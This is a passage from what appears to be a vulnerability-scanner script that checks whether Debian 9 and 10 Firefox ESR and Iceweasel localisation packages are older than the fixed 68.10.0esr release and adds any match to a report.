ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cy\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-da\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-de\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-dsb\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-el\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-en-ca\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-en-gb\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-eo\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-ar\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-cl\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-es\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-mx\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-et\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-eu\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fa\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ff\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fi\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fr\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fy-nl\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ga-ie\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gd\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gl\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gn\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gu-in\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-he\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hi-in\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hr\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hsb\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hu\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hy-am\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ia\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-id\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-is\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-it\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ja\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ka\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kab\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kk\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-km\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kn\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ko\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lij\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lt\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lv\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mk\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mr\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ms\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-my\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nb-no\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ne-np\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nl\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nn-no\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-oc\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pa-in\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pl\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-br\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-pt\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-rm\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ro\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ru\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-si\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sk\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sl\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-son\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sq\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sr\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sv-se\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ta\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-te\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-th\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-tr\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-uk\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ur\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-uz\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-vi\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-xh\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-cn\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-tw\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-dev\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ach\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-af\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-all\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-an\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ar\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-as\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ast\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-az\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-be\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bg\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn-bd\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn-in\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-br\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bs\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ca\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cak\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cs\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cy\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-da\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-de\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-dsb\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-el\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-ca\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-gb\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-za\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-eo\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-ar\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-cl\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-es\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-mx\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-et\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-eu\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fa\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ff\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fi\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fr\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fy-nl\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ga-ie\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gd\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gl\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gn\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gu-in\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-he\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hi-in\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hr\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hsb\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hu\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hy-am\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ia\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-id\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-is\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-it\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ja\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ka\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kab\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kk\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-km\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kn\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ko\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lij\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lt\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lv\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mai\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mk\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ml\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mr\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ms\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-my\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nb-no\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ne-np\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nl\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nn-no\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-oc\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-or\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pa-in\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pl\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-br\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-pt\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-rm\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ro\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ru\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-si\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sk\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sl\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-son\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sq\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sr\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sv-se\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ta\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-te\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-th\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-tr\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-uk\", ver:\"68.10.0esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = 